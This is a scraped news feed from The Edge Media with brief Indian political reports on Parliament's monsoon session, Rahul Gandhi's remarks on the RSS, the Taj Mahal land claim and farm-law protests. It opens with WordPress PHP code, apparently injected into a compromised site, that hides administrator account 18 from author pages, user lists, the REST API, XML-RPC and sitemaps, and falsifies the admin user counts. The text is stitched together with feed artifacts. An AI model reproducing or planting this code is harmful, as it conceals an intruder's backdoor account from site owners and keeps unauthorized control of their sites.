add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Rahul Gandhi Accuses RSS of Attempting to Influence India’s Institutions appeared first on The Edge Media.
]]>Gandhi said that following Mahatma Gandhi’s assassination, the RSS pursued what he described as a long-term goal of gaining control over India’s institutional framework, arguing that the current political atmosphere reflects the results of that sustained effort.
He further contended that the organisation does not support the principle of equality, insisting that its ideology is rooted in hierarchy rather than fairness. According to him, the belief that every Indian is equal “unsettles” those aligned with the RSS.
Emphasising the foundation of Indian democracy, Gandhi said the strength of the nation lies in the equal value of each citizen’s vote. He added that India, with its population of 1.5 billion people, is held together by the democratic right to vote, and he warned that any move to weaken electoral integrity threatens the country’s unity.
The post Rahul Gandhi Accuses RSS of Attempting to Influence India’s Institutions appeared first on The Edge Media.
]]>The post Parliament Paralysis: Monsoon Session Loses 84 Hours to Unprecedented Disruptions appeared first on The Edge Media.
]]>
The month-long session, which began on July 21, held 21 sittings but managed just 37 hours and 7 minutes of effective business, according to the Lok Sabha Secretariat. Speaker Om Birla revealed that all parties had initially agreed to 120 hours of discussions, but planned protests and political standoffs crippled proceedings.
Despite the chaos, the government managed to push through 14 Bills and secure passage of 12 key legislations, including the Promotion and Regulation of Online Gaming Bill, 2025, the Mines and Minerals (Development and Regulation) Amendment Bill, 2025, and the National Sports Governance Bill, 2025.
Parliamentary Affairs Minister Kiren Rijiju described the session as “successful and fruitful for the government but disastrous for the Opposition”, accusing rival parties of deliberately stalling the House.
The Opposition, however, countered by blaming the government’s “authoritarian attitude” for the persistent deadlock. With tensions running high, analysts warn that this growing legislative gridlock threatens India’s policy-making pace.
As the Monsoon session sets a controversial record, questions loom over Parliament’s ability to function effectively amid deepening political divides.
The post Parliament Paralysis: Monsoon Session Loses 84 Hours to Unprecedented Disruptions appeared first on The Edge Media.
]]>The post Taj Mahal’s land was previously owned by the royal family of Jaipur, according to BJP MP Diya Kumari appeared first on The Edge Media.
]]>
Her remarks follow a plea filed in the Allahabad high court, which requested that the Archaeological Survey of India (ASI) open 20 rooms inside the Taj Mahal to check for the existence of Hindu idols. On May 4, Rajneesh Singh, the BJP’s media in-charge for Uttar Pradesh’s Ayodhya district, filed the petition.
The post Taj Mahal’s land was previously owned by the royal family of Jaipur, according to BJP MP Diya Kumari appeared first on The Edge Media.
]]>The post As per the Congress, no ministers attended Jawaharlal Nehru’s birth anniversary event at Parliament appeared first on The Edge Media.
]]>Jairam Ramesh, a Congress Rajya Sabha MP, claimed in a tweet that the Chairman of the Rajya Sabha and the Speaker of the Lok Sabha were both absent from the event, which he described as “unusual.”
He tweeted: “Extraordinary scene today in Parliament at the traditional function to mark the birth anniversary of those whose portraits adorn the Central Hall. Speaker Lok Sabha was absent. Chairman Rajya Sabha absent. Not a single Minister present. Can it get more atrocious than this?”
The post As per the Congress, no ministers attended Jawaharlal Nehru’s birth anniversary event at Parliament appeared first on The Edge Media.
]]>The post The Congress is considering filing a privilege motion in response to BJP ex-MP Vijay’s appointment as NMA chief appeared first on The Edge Media.
]]>
On Thursday, Jairam Ramesh, the Congress’s chief whip in the Rajya Sabha, addressed a letter to Venkaiah Naidu, the head of Parliament’s Upper House, requesting the privileged move. Vijay, a former editor of the Rashtriya Swayamsevak Sangh’s periodical Panchajanya, the BJP’s ideological fountainhead, is unsuitable for the position, according to him. The appointment, according to Ramesh, is a mockery of the law.
The post The Congress is considering filing a privilege motion in response to BJP ex-MP Vijay’s appointment as NMA chief appeared first on The Edge Media.
]]>The post “Sorry State of Affairs,” says Chief Justice; No proper debate in Parliament appeared first on The Edge Media.
]]>He described the current scenario as a sorry state of affairs, saying that there is no real debate in the chamber.
There is a lack of clarity in the laws. We have no idea what the law’s objective is. It is a public embarrassment. He remarked that this is when attorneys and intellectuals are not present in the Houses.
The post “Sorry State of Affairs,” says Chief Justice; No proper debate in Parliament appeared first on The Edge Media.
]]>The post The Opposition Must Apologize, says the government when Visuals of a Ruckus in the Rajya Sabha Emerge appeared first on The Edge Media.
]]>Outsiders were brought in on Wednesday to manhandle MPs, according to the opposition, who spoke to the media on Thursday, complaining about the behavior and criticizing the administration for not allowing them to discuss issues during the Monsoon Session.
Meanwhile, the Vice-President secretariat told ANI that Vice-President M Venkaiah Naidu examined the allegedly “unfortunate” sequence of events in the Parliament in a meeting with Speaker Lok Sabha Om Birla.
The post The Opposition Must Apologize, says the government when Visuals of a Ruckus in the Rajya Sabha Emerge appeared first on The Edge Media.
]]>The post Rahul Gandhi Goes For Farm Laws Protest On Tractor appeared first on The Edge Media.
]]>Gandhi also accompanied the Congress MPs who were denouncing the suspected use of Pegasus malware to spy on opposition politicians. MPs from the SAD, AAP, and BSP were also holding banners asking that agricultural regulations be repealed.
MPs from the Congress, Trinamool Congress (TMC), and other political parties surged into the House well, yelling anti-government chants.
Similarly, Rajya Sabha sessions were postponed for over an hour as opposition parties resumed their objections.
The post Rahul Gandhi Goes For Farm Laws Protest On Tractor appeared first on The Edge Media.
]]>The post Farmers will begin demonstrating outside Parliament on July 22 appeared first on The Edge Media.
]]>According to a plan announced by the Samyukt Kisan Morcha, a platform of farm unions spearheading the protests since November last year against the three laws, nearly 200 farmers will protest outside Parliament every day during the monsoon session.
The Samyukt Kisan Morcha also said farm organisations and like-minded groups would also hold countrywide protests against rising fuel prices on July 8.
Parliament is set to convene on July 19 for its upcoming monsoon session. Farm unions say they would soon dispatch a letter to all Opposition parties and lawmakers, urging them to raise the issue of the three farm laws during the entire session.
Farmers on tractors are likely to file into the Capital on July 21 evening. Accommodation arrangements have been beefed up at all current protest sites.
The post Farmers will begin demonstrating outside Parliament on July 22 appeared first on The Edge Media.
]]>The post Monsoon session of Parliament likely to commence on 19 July appeared first on The Edge Media.
]]>The nearly month-long session is likely to have around 20 sittings, the sources said.
The Monsoon session of Parliament usually commences in the third week of July and concludes ahead of Independence day.
A recommendation about the duration of the session has been made by the Cabinet Committee on Parliamentary Affairs, the sources said.
All Covid related protocols will be followed within the Parliament complex during the session, the sources said, adding that it is hoped that all those entering the complex during the session have taken at least one dose of Covid vaccine.
The post Monsoon session of Parliament likely to commence on 19 July appeared first on The Edge Media.
]]>